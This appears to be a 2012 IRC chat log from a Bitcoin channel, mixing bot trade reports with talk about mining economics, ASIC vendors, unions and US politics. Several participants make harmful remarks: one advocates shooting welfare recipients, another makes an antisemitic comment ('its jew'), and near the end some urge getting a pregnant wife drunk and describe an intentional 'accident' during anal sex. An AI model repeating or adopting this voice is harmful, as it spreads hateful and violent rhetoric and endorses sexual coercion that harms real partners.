hm Nov 02 03:17:17 yeah Nov 02 03:17:28 sorry for the poor selection of the word Nov 02 03:18:03 anway its also poisonous. Nov 02 03:18:18 i grew some fake saffron this year Nov 02 03:18:25 fake? Nov 02 03:18:26 no if you hadn't used that word i wouldn't have learned anything today Nov 02 03:18:31 safflower Nov 02 03:18:44 wonder how well it grows inside Nov 02 03:18:58 https://bitcointalk.org/index.php?topic=121884.msg1311693#msg1311693 Nov 02 03:19:00 doing it right Nov 02 03:19:14 dub it wont do. its a very special plant. Nov 02 03:19:26 The topic or board you are looking for appears to be either missing or off limits to you. Nov 02 03:19:51 generally plants are stupid and can be tricked into thinking they are elsewhere/when Nov 02 03:20:08 dub it can be grown inside but its a pain Nov 02 03:20:34 mircea_popescu if you want i can get you some proper bulb Nov 02 03:20:45 o i can't be bothered myself. Nov 02 03:20:52 but thanks :) Nov 02 03:21:16 actually Nov 02 03:21:21 plants are vastly intelligent Nov 02 03:21:27 as much as Diablo-D3 Nov 02 03:21:34 jk :p Nov 02 03:21:37 seriously, they're like, on a higher plane of existence, man Nov 02 03:21:41 Diablo-D3: can they link to existant subforums? Nov 02 03:23:08 lol Nov 02 03:25:14 speaking of deep shit Nov 02 03:25:16 http://imgur.com/gallery/fkroU Nov 02 03:26:12 http://i.imgur.com/bYb78.jpg Nov 02 03:26:16 that one's pretty good Nov 02 03:37:19 [MPEX] [S.MPOE] 11455 @ 0.00048369 = 5.5407 BTC [-] Nov 02 03:37:20 [MPEX] [S.MPOE] 5445 @ 0.00048339 = 2.6321 BTC [-] Nov 02 03:38:15 mircea_popescu: yeah Nov 02 03:38:32 out of all of them, I think that has the most powerful meaning Nov 02 03:51:29 as a nice bonus, the person doing that isn't usually black. Nov 02 03:54:00 ;;later tell copumpkin https://bitcointalk.org/index.php?topic=121915.0 Nov 02 03:54:00 The operation succeeded. Nov 02 03:57:40 ;;later tell mircea_popescu i need welfare Nov 02 03:57:40 The operation succeeded. Nov 02 03:57:58 you trying to get ignored ? Nov 02 03:59:34 bwahhah Nov 02 04:00:45 :( Nov 02 04:02:30 [MPEX] [S.MPOE] 17100 @ 0.00048339 = 8.266 BTC [-] Nov 02 04:27:34 [MPEX] [S.MPOE] 21896 @ 0.00048339 = 10.5843 BTC [-] Nov 02 04:27:35 [MPEX] [S.MPOE] 11404 @ 0.0004833 = 5.5116 BTC [-] Nov 02 04:35:17 http://trilema.com/2012/bitcoin-and-the-poor/ if anyone;'s curious Nov 02 04:42:10 is that you? Nov 02 04:42:21 [photo] Nov 02 04:42:35 What happened to Goat? Nov 02 04:42:41 I'm gonna have a read Nov 02 04:42:55 Lucidize yup Nov 02 04:42:57 some years ago. Nov 02 04:43:05 B0g4r7 nothing ? or what do you mean Nov 02 04:43:13 On the forums. Nov 02 04:43:19 His avatar says he's banned and censored. Nov 02 04:43:20 wowser, you're a cute guy. Nov 02 04:43:27 Don't worry, I'm not a guy lol :P Nov 02 04:43:37 And his posts now stop at Oct 23rd. Nov 02 04:44:02 https://bitcointalk.org/index.php?topic=119957.msg1292161#msg1292161 Nov 02 04:44:51 a yea he got banned for unclear reasons Nov 02 04:45:04 he says it's because he called theymos out, but my pr chick did the same and she's not banned. Nov 02 04:45:19 there was some sort of conflict there but it's not clear exactly what. Nov 02 04:45:39 Lucidize why ty. Nov 02 04:45:42 Hush-hush as usual. Nov 02 04:45:47 such bs this. Nov 02 04:46:01 I have to apologise to you for being rude one day, a while back Nov 02 04:46:01 people wonder why we attract so many scammers. well... it's the hush. Nov 02 04:46:16 Lucidize haha accepted. tho i don't remember it Nov 02 04:46:27 I was in glbse and blinded and I see now that what you were saying was very true and you are well informed Nov 02 04:46:50 ha! well that's nice. tyvm then. Nov 02 04:47:23 =) Nov 02 04:48:20 Yeah I'm not surprised you don't remember, many ppl would attack you for your views Nov 02 04:48:34 Now we all eat our words Nov 02 04:49:03 aaa, but that's part of growing up. Nov 02 04:49:10 the more words you eat, the bigger you get. Nov 02 04:50:43 like raindrops Nov 02 04:52:38 [MPEX] [S.MPOE] 4096 @ 0.0004833 = 1.9796 BTC [-] Nov 02 04:52:39 [MPEX] [S.MPOE] 13500 @ 0.00048284 = 6.5183 BTC [-] Nov 02 04:52:40 [MPEX] [S.MPOE] 18057 @ 0.00048205 = 8.7044 BTC [-] Nov 02 04:52:41 [MPEX] [S.MPOE] 7747 @ 0.00048178 = 3.7323 BTC [-] Nov 02 05:03:39 :( Nov 02 05:05:06 mircea_popescu: have you seen In Time Nov 02 05:05:20 i dont think so Nov 02 05:05:28 you might ike i Nov 02 05:05:39 people have stopped aging Nov 02 05:05:45 so they use "time" as currency Nov 02 05:06:47 aha Nov 02 05:17:00 smickles: monopoly!!!! Nov 02 05:18:13 [MPEX] [S.MPOE] 9197 @ 0.00048178 = 4.4309 BTC [-] Nov 02 05:18:14 [MPEX] [S.MPOE] 26003 @ 0.00048086 = 12.5038 BTC [-] Nov 02 05:19:22 http://www.nationofchange.org/uaw-files-charges-against-romney-his-auto-bail-out-profiteering-1351783724 Nov 02 05:19:23 welp Nov 02 05:19:26 thats the end of romney Nov 02 05:26:53 dammit Nov 02 05:27:10 so many hilarious facial expressions we'll never see Nov 02 05:28:25 Fuck. You know, fuck is such a wonderful word. It describes, pain, pleasure, surprise, and what I do to the American people each and every day. Nov 02 05:29:04 mrrrpphhmrrrppphh Nov 02 05:29:23 Take my dick out of your mouth before you try to speak. Nov 02 05:29:23 Diablo-D3 not to burts your parade piss, but i don't imagine anyone cares what some union does Nov 02 05:29:37 mircea_popescu: UAW _is_ the auto industry. Nov 02 05:29:42 nope Nov 02 05:29:51 this is automatic front page news on everything Nov 02 05:29:51 it's just some (hopefully soon illegal) union. Nov 02 05:30:06 union = pseudograssroots, democratic party. Nov 02 05:30:18 you dont understand the scope of the UAW Nov 02 05:30:20 its not just a union Nov 02 05:30:32 they own one of the largest industrial complexes in the US Nov 02 05:30:33 isnt america a union? Nov 02 05:30:39 dub: wrong kind of union Nov 02 05:31:00 dude srsly. some union is sueing the republican candidate, who doesn't want them to get more public money. Nov 02 05:31:06 why do you think this registers ? Nov 02 05:31:12 mircea_popescu: the UAW directly engaged the President and Congress over the auto bailout. Nov 02 05:31:19 soooo ? Nov 02 05:31:39 and one of Romney's biggest points was the auto bailout was the worst thing he did besides Obamacare Nov 02 05:31:51 Greg Palast is the author of the New York Times bestseller, "Armed Madhouse" (Penguin Paperback 2007). When Palast, an investigator of corporate fraud and racketeering, turned his skills to journalism, he was quickly recognized as, "The most important investigative reporter of our time" [Tribune Magazine] Nov 02 05:31:53 lol this is funny Nov 02 05:32:06 i hadn't realised just how irrelevant/self referential lefties have gotten in the us. Nov 02 05:32:07 mircea_popescu: do you understand the problem now? Nov 02 05:32:08 carry on lol Nov 02 05:32:25 romney just sank his own battleship on the eve of the election Nov 02 05:32:55 comment #2 on your link Nov 02 05:32:55 UNIONS are not the solution. UNIONS are the problem. Rude, crude, lazy, corrupt BULLIES. Nov 02 05:33:06 dun dun dun. i think this may actually be a net gain for him Nov 02 05:33:17 unions were the solution when it started Nov 02 05:33:21 now they became what they were fighting Nov 02 05:33:25 the problem with unions is they have become corporations Nov 02 05:33:30 exactly dub Nov 02 05:33:45 that and its an easy living for the habitually useless Nov 02 05:33:49 the UAW should have never been allowed to buy up the largest auto manufacturing plant in the US Nov 02 05:33:50 unions are never the solution. Nov 02 05:33:55 Hey mircea, byt the way, has patrick harnett defaulted? Nov 02 05:34:00 Diablo-D3 it was going for free Nov 02 05:34:02 BTC-Mining yes. Nov 02 05:34:03 mircea_popescu: no, unions, _the original kind_, are fine Nov 02 05:34:23 where workers could bind together and fight unfair abusive practices and be legally protected while doing so Nov 02 05:34:25 Hmm, interesting Nov 02 05:34:33 but its clearly an artifact of times gone past Nov 02 05:34:47 the invention of the Internet has largely made unions pointless. Nov 02 05:34:48 BTC-Mining https://bitcointalk.org/index.php?topic=121915.0 Nov 02 05:35:03 Diablo-D3 well... they kinda were pointless originally, too. but anyway. Nov 02 05:35:15 mircea_popescu: it was a gamble, but they worked Nov 02 05:35:27 "they worked". Nov 02 05:35:35 it collapsed a few of the smaller rich people empires and forced the rest to comply Nov 02 05:35:38 they ensured that jobs move out of europe into the us, sure. Nov 02 05:35:52 then they moved jobs into asia Nov 02 05:35:56 but those times are long gone Nov 02 05:35:58 i guess... it worked. Nov 02 05:36:03 they are a counter point to offset the coproration with a competing corporation Nov 02 05:36:06 unions didnt move them into asia though Nov 02 05:36:20 walmart did that. Nov 02 05:36:25 and ford. Nov 02 05:36:27 the good they do is that they need to protect the weak to keep power Nov 02 05:36:34 dub: yes but Nov 02 05:36:46 adn teh weak do need protection Nov 02 05:36:46 when they threaten people for not joining and also act as the bosses of the workers they protect, theres a problem Nov 02 05:37:03 the UAW is just too bigt Nov 02 05:37:07 the weak are weak for a perfectly good reason Nov 02 05:37:14 they don't need any protection. they need incentives to de-weakify. Nov 02 05:37:19 yes but they need to survive Nov 02 05:37:21 mircea_popescu: no Nov 02 05:37:26 or it costs us more in the ned Nov 02 05:37:29 end* Nov 02 05:37:29 the problem there is, the weak are weak because the lack of education Nov 02 05:37:31 and you cant fix it Nov 02 05:37:40 you cant fix it with capitalism Nov 02 05:37:41 either they fix it or suck my cock. Nov 02 05:37:48 a choice emerges. Nov 02 05:37:51 who someone is going to be is set in stone by the time they're 6, give or take. Nov 02 05:37:53 not in its current form anyway Nov 02 05:38:15 we need several generations of intensive education to fix the problem the US has Nov 02 05:38:34 laws wont fix it, unions or the lack thereof wont fix it Nov 02 05:38:37 that problem being, several generations which have been protecred Nov 02 05:38:37 this, everyone is equal idea and can succeed if they want to is quite obviously a sick joke Nov 02 05:38:52 16 yos that know you'll protect them from my cock have 0 incentive to learn anything. Nov 02 05:39:02 mircea_popescu: like, why do you think ending welfare wont work? Nov 02 05:39:11 all its going to do is put a lot of people in prison. Nov 02 05:39:11 ending welfare will work just fine. Nov 02 05:39:14 good. Nov 02 05:39:19 Bad, its more expensive. Nov 02 05:39:23 in the end those that can will pay to look after the weak, its nature Nov 02 05:39:24 we start shooting them. Nov 02 05:39:35 lol mircea_popescu is trolling us Nov 02 05:39:37 gotta make that soylent green somehow. Nov 02 05:39:46 no, im serious. this paradigm that everyone has to make it is bs. Nov 02 05:39:51 mircea_popescu: shooting them doesnt even work Nov 02 05:39:54 life is only worth living if most don't make it. Nov 02 05:39:58 you dont get the money you invested into them back Nov 02 05:40:09 you don't invest anything. Nov 02 05:40:10 they do. Nov 02 05:40:15 no, we all do Nov 02 05:40:22 not once we finally get rid of welfare. Nov 02 05:40:27 each person, from birth to 18 years of age, costs $2m. Nov 02 05:40:35 costs YOU 2m :p Nov 02 05:40:36 shooting them just flushes that down the drain. Nov 02 05:40:42 costs the nation $2m. Nov 02 05:40:52 welfare only exists because capitalism depends on it Nov 02 05:40:54 i don't care about your nation. Nov 02 05:40:58 dub does not. Nov 02 05:41:03 good, the nation doesnt not care about you. Nov 02 05:41:09 we;re find then. Nov 02 05:41:23 fine* Nov 02 05:41:45 Something went wrong in social planning post-WW2. Nov 02 05:41:56 I'm not entirely sure what, its not any single cause doing it. Nov 02 05:41:59 the notion that "social planning" to be exact. Nov 02 05:42:01 there's no such thing. Nov 02 05:42:05 There is. Nov 02 05:42:09 so you think. Nov 02 05:42:15 social planning is exactly like dmc. Nov 02 05:42:16 WW2 was a result of social planning. Nov 02 05:42:27 It was a manufactured war. Nov 02 05:42:39 well i guess that's my limit for tonight. Nov 02 05:44:15 https://bitcointalk.org/index.php?topic=121865.0 Nov 02 05:44:43 [MPEX] [S.MPOE] 17200 @ 0.00048197 = 8.2899 BTC [+] Nov 02 05:44:52 https://bitcointalk.org/index.php?topic=121865.msg1311552#msg1311552 loller Nov 02 05:45:20 hm Nov 02 05:45:46 how many new 'trading platforms' per day is bitcoin at now? Nov 02 05:45:50 i thought these were real securities Nov 02 05:45:53 nevermind then sorry. Nov 02 05:45:55 it seems to be accelerating Nov 02 05:46:10 i always paste the link first and then read it Nov 02 05:46:46 read? I just comment willy nilly Nov 02 05:46:49 dub yes. trading platform. is good professional. Nov 02 05:47:03 I sale platform to you yes Nov 02 05:47:16 very nice and secure Nov 02 05:47:53 slightly dented Nov 02 05:48:28 Goodluck Happy Professional Trading LLC LLQY LTP Nov 02 05:49:04 except the llc papers weren't signed Nov 02 06:00:02 [MPEX] [S.MPOE] 15753 @ 0.0004831 = 7.6103 BTC [+] Nov 02 06:00:03 [MPEX] [S.MPOE] 32083 @ 0.00048494 = 15.5583 BTC [+] Nov 02 06:00:05 [MPEX] [S.MPOE] 27772 @ 0.00048497 = 13.4686 BTC [+] Nov 02 06:00:06 [MPEX] [S.MPOE] 27100 @ 0.00048517 = 13.1481 BTC [+] Nov 02 06:00:07 [MPEX] [S.MPOE] 6783 @ 0.00048552 = 3.2933 BTC [+] Nov 02 06:00:08 [MPEX] [S.MPOE] 10158 @ 0.00048565 = 4.9332 BTC [+] Nov 02 06:00:09 [MPEX] [S.MPOE] 17910 @ 0.00048622 = 8.7082 BTC [+] Nov 02 06:00:09 [MPEX] [S.MPOE] 32000 @ 0.00048803 = 15.617 BTC [+] Nov 02 06:00:11 [MPEX] [S.MPOE] 20700 @ 0.00048818 = 10.1053 BTC [+] Nov 02 06:00:12 [MPEX] [S.MPOE] 8500 @ 0.00048829 = 4.1505 BTC [+] Nov 02 06:00:13 [MPEX] [S.MPOE] 24400 @ 0.00048832 = 11.915 BTC [+] Nov 02 06:00:14 [MPEX] [S.MPOE] 35800 @ 0.00049074 = 17.5685 BTC [+] Nov 02 06:00:15 [MPEX] [S.MPOE] 42100 @ 0.00049224 = 20.7233 BTC [+] Nov 02 06:00:16 [MPEX] [S.MPOE] 18941 @ 0.00049282 = 9.3345 BTC [+] Nov 02 06:00:49 Well once again, if anyone has S.BVPS shares, please PM me and state your rate. Nov 02 06:01:08 !ticker s.mpoe Nov 02 06:01:10 [MPEX:S.MPOE] 1day: 0.00048086 / 0.00048744 / 0.00049519 (1607095 shares, 783.37 BTC), 30day: 0.00025015 / 0.00039123 / 0.0005 (85112884 shares, 33,299.26 BTC) Nov 02 06:01:36 ;;calc (0.00048744-0.00039123)/0.00048744 Nov 02 06:01:37 0.197378138848 Nov 02 06:14:18 next level 'i'll be in my lab' meme, go Nov 02 06:15:20 https://bitcointalk.org/index.php?topic=121624.0 Nov 02 06:15:24 this stuff is pretty good Nov 02 06:17:48 backwards graphs are backwards Nov 02 06:18:32 ya turns out he fudged some numbers Nov 02 06:20:02 number fudger :( Nov 02 06:20:24 fudged I think is being kind Nov 02 06:20:54 Those charts are way off Nov 02 06:20:57 back of the napkin I would say 'pulled directly out of his small intestine' more accurate Nov 02 06:22:22 at $10 and 30m diff SC is $65 day break even Nov 02 06:22:34 er 65 day Nov 02 06:22:50 with $.15/kw Nov 02 06:22:52 what i liked was the idea of making the graphs Nov 02 06:22:58 i guess someone should make right ones Nov 02 06:23:16 65 days? that's the fudged #, right? Nov 02 06:23:19 yeah, at least make your bullshit graphs face teh right direction Nov 02 06:23:40 smickles: I may have fucked up.. http://tpbitcalc.appspot.com/?difficulty=30000000.3930&hashrate=60000.00&exchangerate=10.00&bitcoinsperblock=50.00&rigcost=1300.00&powerconsumption=60.00&powercost=0.15&investmentperiod=355 Nov 02 06:23:56 oh wait 50btc Nov 02 06:24:06 twice that Nov 02 06:24:31 thing is, the diff won't stay 30m for 65 days Nov 02 06:24:33 137 days break even with the SC actually Nov 02 06:24:40 at 30 mill difficulty Nov 02 06:24:45 or especially 137 days Nov 02 06:25:00 can't you calc it with a linnear gain in diff? Nov 02 06:25:09 or lognormal Nov 02 06:25:29 you could but it would be equally meaningless Nov 02 06:25:39 [MPEX] [S.MPOE] 25859 @ 0.00049282 = 12.7438 BTC [+] Nov 02 06:25:40 since it wont be linear or predictable at all Nov 02 06:25:40 [MPEX] [S.MPOE] 13641 @ 0.00049286 = 6.7231 BTC [+] Nov 02 06:26:14 yeah, but i expect it to rise over time Nov 02 06:26:25 of course Nov 02 06:26:43 so why do the calc assuming it stays flat? Nov 02 06:26:59 lazy Nov 02 06:26:59 Nov 02 06:27:07 also its pointless to do it either way :) Nov 02 06:27:35 heh, i'm just glad i got to type lognormal Nov 02 06:27:37 plenty of speculation that mass GPU dieback occurs on reward half Nov 02 06:27:42 Not sure difficulty will raise that much tho Nov 02 06:28:01 some people suspect diff over 100mn by next year Nov 02 06:28:02 but once asic are shipping it will skyrocket, no question Nov 02 06:28:33 100%pa proffit what Nov 02 06:28:35 i for one don't think there's going to be asics in 2012 Nov 02 06:29:08 I'd usually expect the difficulty to raise so that profit on current equipment prices is in the 1-3% weekly range Nov 02 06:29:18 the first person with the first asic on that first diff period will make a lot of btc, relatively Nov 02 06:29:46 well yeah Nov 02 06:29:49 Profit considering expenses, but not equipment's purchase price Nov 02 06:29:51 at current diff payback is in days Nov 02 06:29:53 smickles this is actually a very interesting problem. the companies have no real incentive to ship Nov 02 06:29:53 BTC-Mining: you've noticed price rised laggin on diff increases too? Nov 02 06:30:01 so likely they will ship the entire backlog simultaneously Nov 02 06:30:06 one week for SC Nov 02 06:30:52 mircea_popescu: the must plan to mine like hell as 'testing' untill their actions raise the diff significantly, then ship Nov 02 06:30:55 mircea_popescu: once important incentive, devs have promised an algo swap if they dont Nov 02 06:31:04 smickles exactly. dub devs can get fucked. Nov 02 06:31:11 i dunno why anyone thinks devs matter. Nov 02 06:31:27 they will have support of deepbut et all Nov 02 06:31:32 dev is commodity now, Nov 02 06:31:33 of course they will. Nov 02 06:31:44 they will have support of old miners against new miners Nov 02 06:31:47 algo will swap, asic will die Nov 02 06:31:56 if bitcoin allowed them any advantage because of some such crap it'd be doomed anyway Nov 02 06:32:02 asic vendor will not risk this Nov 02 06:32:10 there is exactly 0 dev can do. Nov 02 06:32:26 in what way can dev be prevented from algo swap if they have mining majority? Nov 02 06:32:34 in the way of owning the new chain. Nov 02 06:32:43 appointing new devs and bye. Nov 02 06:32:51 glwt Nov 02 06:32:56 it's a done deal. Nov 02 06:33:04 bye bye bitcoin Nov 02 06:33:10 what, you think where the crowd of 5000 atlas sockpuppets lies matters ? Nov 02 06:33:15 nope, just bye bye gmaxwell & co. Nov 02 06:33:19 i almost like the idea. Nov 02 06:33:28 I have no love for the devs Nov 02 06:33:34 but I believe they could effect this Nov 02 06:33:35 interesting times ahead, anyway Nov 02 06:33:43 bitcoin won't die just because some old boy's club tries to keep newcomers out Nov 02 06:33:45 or enforce "rules" Nov 02 06:33:55 I think it will Nov 02 06:33:56 there's no rules outside of make blocks. Nov 02 06:33:59 neah. Nov 02 06:34:21 nearly identical thing would rise to replace it Nov 02 06:34:28 yeah lol. the asic's chain Nov 02 06:34:54 but anyway. the shipping problem is that companies don't have an incentive to ship for as long as what they're shipping is worth more than what the people paid for it. Nov 02 06:34:59 probably take years for the failed bitcoin experiment memory to die however Nov 02 06:35:05 once the diff is high enough they'll ship to lock in the payments and avoid refunds Nov 02 06:35:12 but before, even if people refund they're ahead. Nov 02 06:35:29 they've already won Nov 02 06:35:43 "they" ? Nov 02 06:35:54 asic vendors Nov 02 06:36:06 its a captive market Nov 02 06:36:19 the only problem taht could arise is they fuck it up Nov 02 06:36:20 yeah. Nov 02 06:36:35 surefire way to do that is create a 51% problem Nov 02 06:36:51 in a sense the current dev + gpu miner pools are creating that problem as it is Nov 02 06:36:55 they would't 51% Nov 02 06:36:56 with their bs "algo change" threats. Nov 02 06:37:04 it'd devalue btc Nov 02 06:37:27 and they are mining for btc Nov 02 06:37:31 in my eyes the only thing that will ever devalue btc is agreement. Nov 02 06:37:39 i hope the asic-gpu thing comes to a civil war. Nov 02 06:37:45 mircea_popescu: I agree that the current mining cabal is dangerous Nov 02 06:38:05 it's not even a mining cabal, it's a stupidity cabal. Nov 02 06:38:12 clearly displayed in the "let's stick together" around pirate. Nov 02 06:38:16 asshole was defaulting in july. Nov 02 06:38:21 nobody said anything. Nov 02 06:38:39 patrickharnett is in default, i have to say it. if i don't say it nobody does. buddy-buddy Nov 02 06:38:54 the EXACT system that's the problem with politics in the us, and the EXACT reason we can't use fucken fiat anymore. Nov 02 06:38:56 point is threat is enough, asic costs a lot to develop Nov 02 06:39:11 riskign it all by mining a few 10k btc is not smart Nov 02 06:39:13 nobody cares about the toothless threats of some pasty-chested "devs". Nov 02 06:39:24 imagining the contrary is ridiculous. Nov 02 06:39:51 im not sure how you figure they are toothless, they have the majority Nov 02 06:40:10 heh. they have 30 th. Nov 02 06:40:18 if the asics have 35 th they have the minority. Nov 02 06:40:19 I don't think it even matters, an algo war will devalue btc as smickles said Nov 02 06:40:26 asic vendor loses both ways Nov 02 06:40:30 it might devalue btc in the eyes of the foolish. Nov 02 06:40:42 the only value of btc rests on the fact that nobody can actually matter. Nov 02 06:40:52 the devs swithcing algos would easily be seen as anti-freemarket, and people might abandon them over that Nov 02 06:41:04 and bitcoin'd be better off for it Nov 02 06:41:13 not because they're bad people, but bcause we don't want any respected people. Nov 02 06:41:15 51% attack Nov 02 06:41:15 A miner or cartel who controls more than fifty percent of the hashing capacity of the bitcoin mining network has the potential to fraudulently double-spend recent transactions. With majority of hashing power the attacker has the technical ability to mine blocks which do not include a previous spend transactions from the miner but instead include a double spend of the coin. With majority Nov 02 06:41:15 control the potential exists for this double spend even if the transaction had already seen confirmations as those blocks could be overtaken in the attack. Nov 02 06:41:15 The risk lessens of this with each confirmation as the computational advantage the attacker needs grows to a mathematically improbable level and six confirmations is widely accepted as being the amount where the transaction is secure from this attack. Nov 02 06:41:15 it's a liability. Nov 02 06:41:18 in the long run maybe Nov 02 06:41:29 yeah, we'd be better off dropping anti free market peeps Nov 02 06:41:39 We're already waiting for 6 confirmations for big deposits EXACTLY for the 51% attack... Nov 02 06:41:48 BTC-Mining: there is functionally nothing to be gained from actually using a 51% Nov 02 06:41:50 this is the old anti-dictator argument. i'm just rehashing roman republicanism here. Nov 02 06:42:01 chicked feed compared to tooling up for asic production Nov 02 06:42:09 chicken* Nov 02 06:42:25 BTC-Mining that's a different 51% attack you're thinking of. Nov 02 06:42:40 ? Nov 02 06:42:44 in the context we;'re discussing 51% simply means the majority decides by what rules the chains are built. Nov 02 06:42:56 once you succeed at 51% you just lost all your btc value anyway Nov 02 06:43:03 if miner group A uses hashing algo a and miner group B uses hashing algo b Nov 02 06:43:09 Ah, you mean for the rules? Nov 02 06:43:11 bitcoin will use the hashing algo of the larger group Nov 02 06:43:28 the answer is beer Nov 02 06:43:35 If that "51%+" has incompatible rules... then we get a split no? Nov 02 06:43:36 and so the devthreat to change algo only has the merit of the interest of gpu miners, who are doomed anyway Nov 02 06:43:44 BTC-Mining we get a sort-of fork. Nov 02 06:43:53 One chain with regular users, and one with 100% with their own new rules... Nov 02 06:44:06 exactly. and that new one will be the devs. Nov 02 06:44:16 well... ex devs at that point Nov 02 06:44:51 That would be a problem if they push it as the official client... who controls bitcoin.org? Nov 02 06:44:52 imo at that point bitcoin is dead Nov 02 06:44:59 I actually never wondered so far. Nov 02 06:45:01 something else comes up, probalby years later Nov 02 06:45:02 the official client is irrelevant, it doesn't mine. Nov 02 06:45:10 dub nah, it'll be fine. Nov 02 06:45:23 btctalk will be fun to watch tho Nov 02 06:45:28 there'd be uncertainty Nov 02 06:45:35 so buy options Nov 02 06:45:36 we'd get solidcoin Nov 02 06:45:38 and drama Nov 02 06:45:55 eh, that's actually right. But if there's major change, the official client might need to apply new rules for transactions different from the current Nov 02 06:46:28 "official" sounds meaningless in context of a dev-split Nov 02 06:46:32 indeed. Nov 02 06:46:36 there would be no official client, there isnt really now, theres a reference client Nov 02 06:46:38 it's meaningless even as it is Nov 02 06:46:44 yeah. "first client" Nov 02 06:47:06 anyway, i don't think the devs have either the balls or the peabrains to actually go ahead with algo change Nov 02 06:47:13 that they threaten it is fine, but that's all. Nov 02 06:47:15 anyway, as far a business decision goes its madness to even contemplate Nov 02 06:47:16 hence, toothless. Nov 02 06:47:25 dub no it's not. i am actually all for it. Nov 02 06:47:32 will. not. happen. Nov 02 06:47:35 let's have it out now. Nov 02 06:47:39 rather than in 10 years. Nov 02 06:47:47 full onslaught, civil war, bring it. Nov 02 06:47:49 we find out. Nov 02 06:47:55 Lu e-jr has the crazy to try anything he sets his mind to tho Nov 02 06:48:24 smickles: true and he has a lot of mining support which is scary Nov 02 06:48:24 mircea_popescu: you made you money in civil way, didn't you? Nov 02 06:48:24 sure, eligius has all the promise of becoming a fortified compound in utah Nov 02 06:48:40 smickles hm ? Nov 02 06:48:43 smickles: im sure this would factor in to any decision Nov 02 06:49:07 mircea_popescu: its not just his pool, deepbutt and a few others have backed his quackery before Nov 02 06:49:08 Diablo-D3 here, power crews from out of state are trying to come work in ny. they're turned away BECAUSE THEYRE NOT UNION Nov 02 06:49:16 mircea_popescu: oh, not the case? Nov 02 06:49:19 dub gpu miners have a vested interest. Nov 02 06:49:26 smickles what ? Nov 02 06:49:27 mircea_popescu: okay, so? Nov 02 06:49:34 Diablo-D3 just sayin'. Nov 02 06:49:42 thats the governor's fault Nov 02 06:49:48 you watch new york return a full complement of teapartiers for the senate. Nov 02 06:50:02 so you were born in the 70's, i guess you were too young to make money when romania broke free, eh? Nov 02 06:50:06 everyone thinks ny is blue, they're so pissed at democrats right now it'll happen. Nov 02 06:50:17 ny isnt red or blue Nov 02 06:50:19 its jew. Nov 02 06:50:20 smickles i'm never too young. Nov 02 06:50:30 mircea_popescu is like 14, smickles Nov 02 06:50:40 but romania never had a civil war ? or you mean the revolution ? Nov 02 06:50:55 yeah, i guess i conflated the two Nov 02 06:51:17 did no one oppose the revolution? Nov 02 06:51:23 a well. fyi, what the romanian revolution was is this : ohio state students taking over the troops, then executing nixon. Nov 02 06:51:24 [MPEX] [S.MPOE] 28200 @ 0.00049229 = 13.8826 BTC [-] Nov 02 06:51:25 [MPEX] [S.MPOE] 2000 @ 0.00049 = 0.98 BTC [-] Nov 02 06:52:00 I think you are putting far to much faith in the ideology of asic vendors, given a choice between mining a few btc which are sure to become nearly worthless at least for a while, and profiting hugely in the long term.. they will ship Nov 02 06:52:30 dub well in practical terms it'll be a miracle if they have anything to ship anyway,. Nov 02 06:52:52 why? all it takes is money Nov 02 06:53:04 its not like they are inventing something or breaking ground Nov 02 06:53:18 they are building an IC Nov 02 06:53:30 just like millions of other products before them Nov 02 06:53:41 yeah, but the % of bitcoin biz that turns out to be a scam after time is high Nov 02 06:53:54 dub they are breaking ground, for one, and it takes 10 to 100x more money than they have. Nov 02 06:54:25 not really Nov 02 06:54:54 well, technically, is there a product on market that does this already? Nov 02 06:55:00 nope. Nov 02 06:55:08 zactly Nov 02 06:55:24 no but its just producing a hardware fpga Nov 02 06:55:28 of sorts Nov 02 06:55:33 it's like saying fucking your wife in the ass is not breaking ground and doesn't require any resources Nov 02 06:55:37 cause she already had a kid. Nov 02 06:55:45 its not a question of if it can be done Nov 02 06:55:51 ^^ Nov 02 06:55:55 mircea_popescu: excellent anology Nov 02 06:56:14 i still havent got it that wy Nov 02 06:56:29 from her anyway Nov 02 06:56:29 i was shocked to find most us couples still don't do it Nov 02 06:56:52 she's just small and won't use a plug Nov 02 06:57:04 you might need to spend up front on some nice wine or flowers Nov 02 06:57:13 but i like to think that i'm too big ;) Nov 02 06:57:24 all buttvirgins are small lol Nov 02 06:58:02 dub has a point. half bottle wine enema. Nov 02 06:59:02 it was our anniversary on the 30th just past, as likly to happen then as ever Nov 02 06:59:23 just get her drunk Nov 02 06:59:27 lol Nov 02 06:59:30 use lube Nov 02 06:59:40 naw, she's preggers Nov 02 07:00:01 patience young padawan Nov 02 07:00:04 well that's no time to teach ehr anal Nov 02 07:00:11 you will get those brown wings Nov 02 07:00:25 did she get hemorrhoids on the first one ? Nov 02 07:00:26 lol Nov 02 07:00:42 mircea_popescu: nope Nov 02 07:00:51 a well. lucky girl. Nov 02 07:01:07 she had to have a c-section tho Nov 02 07:01:18 shows great promise of much enjoyments. just tell her ppl on irc said you should give her tiem Nov 02 07:01:19 you could go for the 'accident' but its probably not idea for continuing the sport Nov 02 07:01:25 ideal* Nov 02 07:01:42 lol accident such bs Nov 02 07:02:00 the irc argument has worked for other things in the past :D Nov 02 07:02:01 I've done it Nov 02 07:02:09 hitting from back, oops wrong hole Nov 02 07:02:17 *yelp* Nov 02 07:03:13 well, i call successful derailment of conversation Nov 02 07:03:15 smickles o ya ? did she get a leash ? Nov 02 07:03:29 ya srsly, smickles is worse than ciuciu. Nov 02 07:03:38 mircea_popescu: we already had a leash ;) Nov 02 07:03:48 no but i meant for her not for you Nov 02 07:03:55 lol Nov 02 07:03:57 hehe Nov 02 07:05:37 maybe i'll try it someday, but she doesn't seem like she'd be good at the dom end Nov 02 07:05:49 arent you wearign it around your leash^W ring finger? Nov 02 07:06:04 Hmm, right on channel's topic. Guess I'll stay out of it. Nov 02 07:06:24 asic and anal, not so different Nov 02 07:06:41 both hurt a little at first Nov 02 07:06:45 dub: you mean the thing that makes it more dificult to fend of other women? Nov 02 07:07:05 smickles: yeah, I jest, be wearing one myself sooner rather than later Nov 02 07:07:06 i got less advances before the ring than after, Nov 02 07:08:02 its not the ring, chicks can smell how full a mans balls are Nov 02 07:08:12 lololllool Nov 02 07:10:18 20+k sold, .5 drop Nov 02 07:10:34 i don't care what antyone says, btc is solid as a rock. Nov 02 07:11:55 ;;ticker Nov 02 07:11:55 BTCUSD ticker | Best bid: 10.69308, Best ask: 10.77499, Bid-ask spread: 0.08191, Last trade: 10.77499, 24 hour volume: 47684.46748761, 24 hour low: 10.40000, 24 hour high: 11.20999, 24 hour vwap: 10.87540 Nov 02 07:12:01 ;;bc,24hprc Nov 02 07:12:02 10.87 Nov 02 07:12:56 !ticker S.MPOE Nov 02 07:12:57 